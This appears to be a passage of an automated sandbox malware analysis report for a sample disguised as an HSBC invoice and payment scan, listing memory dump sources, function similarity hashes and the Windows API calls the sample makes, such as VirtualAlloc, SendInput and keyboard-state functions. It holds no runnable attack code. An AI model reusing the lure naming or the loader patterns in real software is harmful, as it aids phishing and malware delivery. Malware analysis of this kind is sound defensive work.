                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ErrorHandling__87except__start
                    • String ID: pow
                    • API String ID: 2905807303-2276729525
                    • Opcode ID: 10b0887f900c98ad1433c1186aeab491450e52123b475ca21143ebac0cfc7e38
                    • Instruction ID: fcf8c71e94b4586a8eb55ff92ae448a0fe42e81f74abd32e64b17be3c653ce34
                    • Opcode Fuzzy Hash: 10b0887f900c98ad1433c1186aeab491450e52123b475ca21143ebac0cfc7e38
                    • Instruction Fuzzy Hash: 49518B22A0C70586CB107714CA413FF3BE09B56354F20AD68F4A5791E9EF74BCD8AA91
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID:
                    • String ID: #$+
                    • API String ID: 0-2552117581
                    • Opcode ID: 44ccacfcad9818bfb18e1b50b0947022da9aff565f8063062e4120067d66562d
                    • Instruction ID: f7ba138527055dea61a1b253bcc0472d1b4d379bc4d159fea317940f9def3656
                    • Opcode Fuzzy Hash: 44ccacfcad9818bfb18e1b50b0947022da9aff565f8063062e4120067d66562d
                    • Instruction Fuzzy Hash: 1A5111365052468FCF259F28C8886FA7BA6EF1A314F145056E895BF3A0D730AD47CB71
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: _memmove$_free
                    • String ID: Oa
                    • API String ID: 2620147621-3945284152
                    • Opcode ID: 923363c4d2b0f841ca3c7f6f4fe314dd8d51aca35be18384ff3c345424bcf3d3
                    • Instruction ID: 88c617e50ff532999c69d870c7c92ed3d06b8f81025608f1649c033c151685a9
                    • Opcode Fuzzy Hash: 923363c4d2b0f841ca3c7f6f4fe314dd8d51aca35be18384ff3c345424bcf3d3
                    • Instruction Fuzzy Hash: 3C514BB16083419FDB24CF68C441B6BBBE5FF89314F05592DE989A7361DB31E901CB52
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: _memset$_memmove
                    • String ID: ERCP
                    • API String ID: 2532777613-1384759551
                    • Opcode ID: 67a1c09767811529c477e260b01a7cde94a81c0fab6c84a9955060a6bffa9165
                    • Instruction ID: 25a8374c2b898d3a67b77cfd0fb72098019d3eb661717191b1c1c02df1fa0648
                    • Opcode Fuzzy Hash: 67a1c09767811529c477e260b01a7cde94a81c0fab6c84a9955060a6bffa9165
                    • Instruction Fuzzy Hash: 0551B1719007099BDF24CFA5C8917AABBF4FF04718F20956FEA5AEB241E771A581CB40
                    APIs
                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00EDDAFB
                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00EDDB0C
                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00EDDB8E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ErrorMode$AddressProc
                    • String ID: DllGetClassObject
                    • API String ID: 1548245697-1075368562
                    • Opcode ID: 674441d2896f76f38baca5a7756564c72c2c0b8c6e730f1d00b5faa431ea64e1
                    • Instruction ID: 58f94f37a34734f4fa4aea45e1ef29c63268e861a00d1bf3bb9df81d25debacf
                    • Opcode Fuzzy Hash: 674441d2896f76f38baca5a7756564c72c2c0b8c6e730f1d00b5faa431ea64e1
                    • Instruction Fuzzy Hash: 5F41AEB1604208EFDB14CF54CC84A9ABBA9EF48314F1591ABED05AF305D7B1DE45DBA0
                    APIs
                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00F0F910,00000000,?,?,?,?), ref: 00F07C4E
                    • GetWindowLongW.USER32 ref: 00F07C6B
                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F07C7B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Window$Long
                    • String ID: SysTreeView32
                    • API String ID: 847901565-1698111956
                    • Opcode ID: 250ab69f7bf8b5945491fc457b43592828a96f4d24f835a6e2eae0b8135f3f7a
                    • Instruction ID: 072eb4983c0f4394a49f8cd2614d61704f2a736a71e8e8687a7a645762a40cb6
                    • Opcode Fuzzy Hash: 250ab69f7bf8b5945491fc457b43592828a96f4d24f835a6e2eae0b8135f3f7a
                    • Instruction Fuzzy Hash: 45319231A04209ABDB21AF34CC41BEA77A9FB45334F248725F979A21E0D731EC51BB50
                    APIs
                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00F076D0
                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00F076E4
                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F07708
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessageSend$Window
                    • String ID: SysMonthCal32
                    • API String ID: 2326795674-1439706946
                    • Opcode ID: 80eb3aeffa55fca8550b1e00f2afac4df7d04687f0ff325a47b6e516688c0b4b
                    • Instruction ID: 9b45d69bd92dbb712df6c96452851743f33b8d51c683e6ed1570904cf08905e7
                    • Opcode Fuzzy Hash: 80eb3aeffa55fca8550b1e00f2afac4df7d04687f0ff325a47b6e516688c0b4b
                    • Instruction Fuzzy Hash: CF21D332900218BBDF21DF54CC42FEA3BA9EF48724F110254FE156B1D0DAB1B851ABA0
                    APIs
                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00F06FAA
                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00F06FBA
                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00F06FDF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessageSend$MoveWindow
                    • String ID: Listbox
                    • API String ID: 3315199576-2633736733
                    • Opcode ID: f0948d6a86b434bb94f160f281b68e3b0872c050f442c18e46076c2fdbbbe16c
                    • Instruction ID: 0cdc6abc4bb2ff24dd3164b68f393097511397b93a56064f0b06b5b5156b4ccd
                    • Opcode Fuzzy Hash: f0948d6a86b434bb94f160f281b68e3b0872c050f442c18e46076c2fdbbbe16c
                    • Instruction Fuzzy Hash: B321C532A10119BFDF118F54DC85FAB37AAEF89765F018124F904DB1D0D6719C62A7A0
                    APIs
                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00F079E1
                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00F079F6
                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00F07A03
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: msctls_trackbar32
                    • API String ID: 3850602802-1010561917
                    • Opcode ID: 215b3c0b56621b34bd4be3726c24bf41b66ea355e1ff17ce20b75dbd0e934f8e
                    • Instruction ID: c0a11547f449b975b3a67f83a2d261136194838d63a23f66b2630796aa90099b
                    • Opcode Fuzzy Hash: 215b3c0b56621b34bd4be3726c24bf41b66ea355e1ff17ce20b75dbd0e934f8e
                    • Instruction Fuzzy Hash: FB11E732A44208BAEF10AF60CC05F9B77A9EF89764F014519FA45A60E0D675E811EB60
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00EC1D88,?), ref: 00EFC312
                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00EFC324
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                    • API String ID: 2574300362-1816364905
                    • Opcode ID: 501b5a217fa0b23ff5cebc64d8ab917852c9dbaac741a459217b6b5648dc559b
                    • Instruction ID: 097ec5add6bc67fd73d878e559b1e73d382a96752575199380f546d57e3706f6
                    • Opcode Fuzzy Hash: 501b5a217fa0b23ff5cebc64d8ab917852c9dbaac741a459217b6b5648dc559b
                    • Instruction Fuzzy Hash: 94E0C2B460131BCFCB344F25C804A9676D4FF4879CFA0D47AE985E2650E770D840DBA0
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00E84C2E), ref: 00E84CA3
                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00E84CB5
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetNativeSystemInfo$kernel32.dll
                    • API String ID: 2574300362-192647395
                    • Opcode ID: 0c0207db955199b77c6721cae29ceacf8bc8a3127ccddb67e5c57a9b6888dd3a
                    • Instruction ID: c0058e251011197f457bbcd2d245a9b58f7941af9e8ee41d589aa5b6a86e7da7
                    • Opcode Fuzzy Hash: 0c0207db955199b77c6721cae29ceacf8bc8a3127ccddb67e5c57a9b6888dd3a
                    • Instruction Fuzzy Hash: 9CD012B0510727CFD730AF31DD18606B6D9BF05755B21883A9889D6990D674D484EB51
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00E84CE1,?), ref: 00E84DA2
                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E84DB4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                    • API String ID: 2574300362-1355242751
                    • Opcode ID: 3f5afa4bc101afab34b08de5b13e5c07d1632991b09c76267dd6b3e419fb0789
                    • Instruction ID: 7cd69325f3ac464a59579df4b7d290b78503bc8280cc8b851f957cac282a7c9b
                    • Opcode Fuzzy Hash: 3f5afa4bc101afab34b08de5b13e5c07d1632991b09c76267dd6b3e419fb0789
                    • Instruction Fuzzy Hash: 0FD017B1950717CFD730AF31D808A46B6E4FF09359B11883AD8CAE69D0E770D884EB51
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00E84D2E,?,00E84F4F,?,00F462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E84D6F
                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E84D81
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                    • API String ID: 2574300362-3689287502
                    • Opcode ID: f68fa8e8cc0981327092dce9de57241784a62c874bd083b2765e6f04fe09f986
                    • Instruction ID: ad877013f3c286b039469b03f6f7f0c6dd3e624426580eaf0cea578e67d4c439
                    • Opcode Fuzzy Hash: f68fa8e8cc0981327092dce9de57241784a62c874bd083b2765e6f04fe09f986
                    • Instruction Fuzzy Hash: 0BD017B0910717CFD730AF31D808616B6E8BF5536AB118C3A988AE6AD0E770D884EB51
                    APIs
                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00F012C1), ref: 00F01080
                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F01092
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: RegDeleteKeyExW$advapi32.dll
                    • API String ID: 2574300362-4033151799
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00EF9009,?,00F0F910), ref: 00EF9403
                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00EF9415
                    Strings
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetModuleHandleExW$kernel32.dll
                    • API String ID: 2574300362-199464113
                    APIs
                    • CharLowerBuffW.USER32(?,?), ref: 00EFE3D2
                    • CharLowerBuffW.USER32(?,?), ref: 00EFE415
                      • Part of subcall function 00EFDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00EFDAD9
                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00EFE615
                    • _memmove.LIBCMT ref: 00EFE628
                    Similarity
                    • API ID: BuffCharLower$AllocVirtual_memmove
                    • String ID:
                    • API String ID: 3659485706-0
                    APIs
                    Similarity
                    • API ID: Variant$AllocClearCopyInitString
                    • String ID:
                    • API String ID: 2808897238-0
                    APIs
                    • GetWindowRect.USER32(011BE728,?), ref: 00F09AD2
                    • ScreenToClient.USER32(00000002,00000002), ref: 00F09B05
                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00F09B72
                    Similarity
                    • API ID: Window$ClientMoveRectScreen
                    • String ID:
                    • API String ID: 3880355969-0
                    APIs
                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00EEBB09
                    • GetLastError.KERNEL32(?,00000000), ref: 00EEBB2F
                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00EEBB54
                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00EEBB80
                    Similarity
                    • API ID: CreateHardLink$DeleteErrorFileLast
                    • String ID:
                    • API String ID: 3321077145-0
                    APIs
                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F08B4D
                    Similarity
                    • API ID: InvalidateRect
                    • String ID:
                    • API String ID: 634782764-0
                    APIs
                    • ClientToScreen.USER32(?,?), ref: 00F0AE1A
                    • GetWindowRect.USER32(?,?), ref: 00F0AE90
                    • PtInRect.USER32(?,?,00F0C304), ref: 00F0AEA0
                    • MessageBeep.USER32(00000000), ref: 00F0AF11
                    Similarity
                    • API ID: Rect$BeepClientMessageScreenWindow
                    • String ID:
                    • API String ID: 1352109105-0
                    APIs
                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00EE1037
                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00EE1053
                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00EE10B9
                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00EE110B
                    Similarity
                    • API ID: KeyboardState$InputMessagePostSend
                    • String ID:
                    • API String ID: 432972143-0
                    APIs
                    • GetKeyboardState.USER32(?,7608C0D0,?,00008000), ref: 00EE1176
                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00EE1192
                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 00EE11F1
                    • SendInput.USER32(00000001,?,0000001C,7608C0D0,?,00008000), ref: 00EE1243
                    Similarity
                    • API ID: KeyboardState$InputMessagePostSend
                    • String ID:
                    • API String ID: 432972143-0
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00EB644B
                    • __isleadbyte_l.LIBCMT ref: 00EB6479
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00EB64A7
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00EB64DD
                    Similarity
                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                    • String ID:
                    • API String ID: 3058430110-0
                    APIs
                    • GetForegroundWindow.USER32 ref: 00F05189
                      • Part of subcall function 00EE387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00EE3897
                      • Part of subcall function 00EE387D: GetCurrentThreadId.KERNEL32 ref: 00EE389E
                      • Part of subcall function 00EE387D: AttachThreadInput.USER32(00000000,?,00EE52A7), ref: 00EE38A5
                    • GetCaretPos.USER32(?), ref: 00F0519A
                    • ClientToScreen.USER32(00000000,?), ref: 00F051D5
                    • GetForegroundWindow.USER32 ref: 00F051DB
                    Similarity
                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                    • String ID:
                    • API String ID: 2759813231-0
                    APIs
                    • __setmode.LIBCMT ref: 00EA0BF2
                      • Part of subcall function 00E85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00EE7B20,?,?,00000000), ref: 00E85B8C
                      • Part of subcall function 00E85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00EE7B20,?,?,00000000,?,?), ref: 00E85BB0
                    • _fprintf.LIBCMT ref: 00EA0C29
                    • OutputDebugStringW.KERNEL32(?), ref: 00ED6331
                      • Part of subcall function 00EA4CDA: _flsall.LIBCMT ref: 00EA4CF3
                    • __setmode.LIBCMT ref: 00EA0C5E
                    Similarity
                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                    • String ID:
                    • API String ID: 521402451-0
                    APIs
                      • Part of subcall function 00ED8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00ED8669
                      • Part of subcall function 00ED8652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00ED8673
                      • Part of subcall function 00ED8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00ED8682
                      • Part of subcall function 00ED8652: RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00ED8689
                      • Part of subcall function 00ED8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00ED869F
